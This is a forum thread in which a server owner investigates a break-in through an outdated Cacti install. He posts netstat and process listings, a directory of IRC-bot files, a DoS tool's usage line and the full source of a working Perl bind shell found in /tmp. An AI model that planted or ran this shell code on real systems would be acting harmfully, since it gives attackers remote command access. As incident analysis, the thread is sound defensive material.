Results 1 to 8 of 8
-
07-11-2005, 02:38 PM #1Web Hosting Master
- Join Date
- Jun 2002
- Posts
- 1,378
Apache "stealth" process? What is it?
Can someone tell me what just happened?
Background: I run a Linux desktop, but it's also facing the net (port 8080) as a webserver. (For services, it's providing ssh, http, samba, amphetadesk, and webmin. I'm NAT'ed, though, so only port 8080 is actually facing the public.)
All of a sudden I couldn't get anywhere online, so I started investigating. While looking at network stats, I happened to notice one of my CPUs was spiked at full usage.
top revealed a process known as "stealth" -- owned by user apache -- at 100% CPU usage.
Anyone know what this is? Or where it came from? Unless they were really good (somehow breaching the router, getting into the LAN, and attacking me from there), the only port anyone could see was 8080, running Apache, so, assuming this was some exploit, that's how they got in.
I'm going to poke through the logs to see if I can find anything. But has anyone seen this before that can offer some help?
-
07-11-2005, 02:42 PM #2Web Hosting Master
- Join Date
- Jun 2002
- Posts
- 1,378
Code:# netstat --inet -W Active Internet connections (w/o servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 510 0 localhost:http localhost:52749 CLOSE_WAIT tcp 288 0 dehimifier:webcache lj2517.inktomisearch.com:57759 CLOSE_WAIT tcp 191 0 dehimifier:webcache lj2536.inktomisearch.com:47502 CLOSE_WAIT tcp 0 1 dehimifier:32822 mblk-d28.mblk.aol.com:ircd SYN_SENT tcp 0 0 dehimifier:54685 oam-d10a.blue.aol.com:5190 TIME_WAIT tcp 95 0 localhost:http localhost:59978 CLOSE_WAIT tcp 0 0 dehimifier:57204 caim-d04b.blue.aol.com:5190 TIME_WAIT tcp 0 0 dehimifier:45874 64.12.25.20:5190 TIME_WAIT
The blue.aol.com is my AIM connection; I signed off right before running it, which apparently put them in CLOSE_WAIT. I'm not sure what's going on with the ircd port. I don't really use IRC.
I ran this the first time, note the IRC connection to another host:
Code:# netstat --inet Active Internet connections (w/o servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 510 0 localhost:http localhost:52749 CLOSE_WAIT tcp 288 0 dehimifier:webcache lj2517.inktomisea:57759 CLOSE_WAIT tcp 191 0 dehimifier:webcache lj2536.inktomisea:47502 CLOSE_WAIT tcp 0 1 dehimifier:32821 sodium.mlink.net:ircd SYN_SENT tcp 0 0 dehimifier:54685 oam-d10a.blue.aol.:5190 ESTABLISHED tcp 95 0 localhost:http localhost:59978 CLOSE_WAIT tcp 0 0 dehimifier:57204 caim-d04b.blue.aol:5190 ESTABLISHED tcp 0 0 dehimifier:45874 64.12.25.20:5190 ESTABLISHED tcp 0 0 localhost:52749 localhost:http FIN_WAIT2 tcp 0 0 localhost:59978 localhost:http FIN_WAIT2
-
07-11-2005, 02:47 PM #3Web Hosting Master
- Join Date
- Jun 2002
- Posts
- 1,378
Methinks someone's gotten in. I stopped Apache, but port 80 and 8080 (and 443) are still open. Playing with netstat options some more:
Code:# netstat --inet -W -e -e Active Internet connections (w/o servers) Proto Recv-Q Send-Q Local Address Foreign Address State User Inode tcp 510 0 localhost:http localhost:52749 CLOSE_WAIT root 0 tcp 0 0 localhost:40460 localhost:webcache ESTABLISHED n1zyy 2162851 tcp 288 0 dehimifier:webcache lj2517.inktomisearch.com:57759 CLOSE_WAIT root 0 tcp 191 0 dehimifier:webcache lj2536.inktomisearch.com:47502 CLOSE_WAIT root 0 tcp 514 0 localhost:webcache localhost:40460 ESTABLISHED root 0 tcp 95 0 localhost:http localhost:59978 CLOSE_WAIT root 0 tcp 0 0 dehimifier:32823 oslo2.no.eu.undernet.org:ircd ESTABLISHED apache 2162790
How do I stop an Apache process that isn't running?
Edit: some more fun:
Code:# ps aux | grep ^apache apache 27637 0.0 0.0 1316 324 ? Ss Jul10 0:00 bin/bsh apache 27697 0.0 0.1 1744 828 ? Ss Jul10 0:00 ./sendmail
-
07-11-2005, 02:56 PM #4Web Hosting Master
- Join Date
- Jun 2002
- Posts
- 1,378
Looks like they were working out of /tmp.
Some interesting entries:
shell.pl
Code:#!/usr/bin/perl use Socket; $port=4444; $proto=getprotobyname('tcp'); $cmd="lpd"; $system='/bin/sh'; $0=$cmd; socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!"; setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!"; bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!"; listen(SERVER, SOMAXCONN) or die "listen: $!"; for(;$paddr=accept(CLIENT, SERVER);close CLIENT) { open(STDIN, ">&CLIENT"); open(STDOUT, ">&CLIENT"); open(STDERR, ">&CLIENT"); system($system); close(STDIN); close(STDOUT); close(STDERR); }
Code:# cd bin && ls -l total 20 -rwxr-xr-x 1 apache apache 19426 May 19 15:41 bsh
Code:# ls -l /tmp/cycomm/ total 1270 -rw-r--r-- 1 apache apache 2156 Jul 10 09:31 Makefile -rwxr-xr-x 1 apache apache 20358 Jan 1 2003 configure drwxr-xr-x 4 apache apache 128 May 28 2004 contrib -rw-r--r-- 1 apache apache 22465 Jun 13 2001 cyc.help -rw-r--r-- 1 apache apache 1047 Jul 11 14:00 cyc.levels -rw------- 1 apache apache 6 Jul 10 22:45 cyc.pid -rw-r--r-- 1 apache apache 768 Jul 11 14:00 cyc.session -rwxr-xr-x 1 apache apache 2354 Jul 10 21:23 cyc.set -rwxr-xr-x 1 apache apache 592978 Jul 10 18:30 cycmech -rw-r--r-- 1 apache apache 72 Jul 11 14:00 emech.users -rwxr-xr-x 1 apache apache 4147 Jan 22 2002 genuser -rwxr-xr-x 1 apache apache 14306 Jul 5 19:31 proc drwxr-xr-x 2 apache apache 304 May 28 2004 randfiles -rwxr-xr-x 1 apache apache 592978 Jul 10 18:30 sendmail drwxr-xr-x 2 apache apache 1208 Jul 10 18:30 src -rwxr-xr-x 1 apache apache 13399 Jul 5 07:38 stealth
-
07-11-2005, 03:17 PM #5Web Hosting Master
- Join Date
- Jun 2002
- Posts
- 1,378
Okay, my apologies for the barrage of posts. I was sort of freaking out. As it's a desktop box, I have the luxury of just being able to pull it off the network and take my time. (I'm now on a laptop.)
What I'm really interested in now is how they got in. I'd have expected it to be over ssh or something, but they really shouldn't have been able to. (Unless first getting into something else on the LAN here.)
That "stealth" program is clearly no good:
Code:# ./stealth -h twitch@Stealth: This tool is extremely dangerous. Use at your own risk! Usage: st-kill <host> <port>
Can anyone offer me help in tracking exactly how they got in?Last edited by fog; 07-11-2005 at 03:31 PM.
-
07-11-2005, 03:29 PM #6Web Hosting Master
- Join Date
- Jun 2002
- Posts
- 1,378
Heh, think I found it. (Might I mention I'm suddenly glad I went with mod_log_sql? It's wonderful when you have to go searching.)
Someone found me off of search.yahoo.com with a search phrase of "Please enter your cacti user name and password"
It looks like older versions (<=0.8.6d) of cacti are vulnerable to remote command execution. Guess who's running 0.8.5a?
-
07-11-2005, 03:51 PM #7Junior Guru
- Join Date
- Apr 2005
- Location
- Sweden
- Posts
- 241
Geez, you needed a lot of help from here eh?
Kiddin, good work though. Next time you want to check out strings in a binary file there is the "strings" command (may or may not be installed) that can be easier than just looking though it with an editor.
Typically if you see a box with a lot of junk in /tmp and not-so-carefully hidden processes, you can be almost sure its a vulnerability in a php or cgi script somewhere.
-
05-04-2011, 11:09 AM #8New Member
- Join Date
- May 2011
- Posts
- 1
This is May 4, 2011 and I have the same problem. I found your thread today with the same process running owning nearly 100% CPU. The only difference is that the owner of that process is guest instead of apache. I have Fedora 14, and all packages are up-to-date.